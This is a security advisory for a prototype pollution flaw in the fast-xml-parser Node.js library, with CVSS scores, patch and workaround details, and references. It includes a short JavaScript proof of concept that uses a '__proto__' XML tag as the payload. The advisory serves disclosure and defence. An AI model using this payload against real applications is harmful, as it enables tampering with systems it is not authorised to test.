GitHub Advisory DatabaseGHSA-X3CC-X39P-42QXfast-xml-parser vulnerable to Prototype Pollution through tag or attribute name
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
EPSS
Percentile
27.5%
Impact
As a part of this vulnerability, user was able to se code using __proto__ as a tag or attribute name.
const { XMLParser, XMLBuilder, XMLValidator} = require("fast-xml-parser");
let XMLdata = "<__proto__><polluted>hacked</polluted></__proto__>"
const parser = new XMLParser();
let jObj = parser.parse(XMLdata);
console.log(jObj.polluted) // should return hacked
Patches
The problem has been patched in v4.1.2
Workarounds
User can check for “proto” in the XML string before parsing it to the parser.
References
https://gist.github.com/Sudistark/a5a45bd0804d522a1392cb5023aa7ef7
Affected configurations
| Vendor | Product | Version | CPE |
|---|---|---|---|
| fast-xml-parser_project | fast-xml-parser | * | cpe:2.3:a:fast-xml-parser_project:fast-xml-parser:*:*:*:*:*:node.js:*:* |
References
gist.github.com/Sudistark/a5a45bd0804d522a1392cb5023aa7ef7
github.com/advisories/GHSA-793h-6f7r-6qvm
github.com/advisories/GHSA-x3cc-x39p-42qx
github.com/NaturalIntelligence/fast-xml-parser/commit/2b032a4f799c63d83991e4f992f1c68e4dd05804
github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-x3cc-x39p-42qx
nvd.nist.gov/vuln/detail/CVE-2023-26920
Related
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
EPSS
Percentile
27.5%